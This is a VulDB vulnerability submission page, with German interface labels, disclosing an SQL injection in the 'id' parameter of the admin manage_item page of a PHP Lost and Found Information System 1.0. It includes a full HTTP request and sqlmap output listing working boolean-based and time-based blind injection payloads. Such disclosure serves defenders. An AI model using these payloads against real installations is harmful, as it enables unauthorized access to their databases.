Submit #156023: SQL Injection in admin edit items/manage_item Lost and Found Information System 1.0info

TitelSQL Injection in admin edit items/manage_item Lost and Found Information System 1.0
BeschreibungSource: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html Production: Lost and Found Information System Version: 1.0 Vuln: SQL Injection Poc Image: https://github.com/tht1997/CVE_2023/blob/main/Lost%20and%20Found%20Information%20System/img/edit_item.png Request: GET /php-lfis/admin/?page=items/manage_item&id=16 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=cjvq90aj2a5aaq7trm1s90ps9h Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 SQLmap: GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y sqlmap identified the following injection point(s) with a total of 251 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=items/manage_item&id=16' AND 3079=3079 AND 'nKOI'='nKOI Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=items/manage_item&id=16' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))hSQK) AND 'ttdt'='ttdt ---
Quelle⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
Benutzer
 huutuanbg97 (UID 45015)
Einreichung13.05.2023 06:04 (vor 3 Jahren)
Moderieren14.05.2023 09:59 (1 day later)
StatusAkzeptiert
VulDB Eintrag228979 [SourceCodester Lost and Found Information System 1.0 GET Parameter manage_item ID SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Do you want to use VulDB in your project?

Use the official API to access entries easily!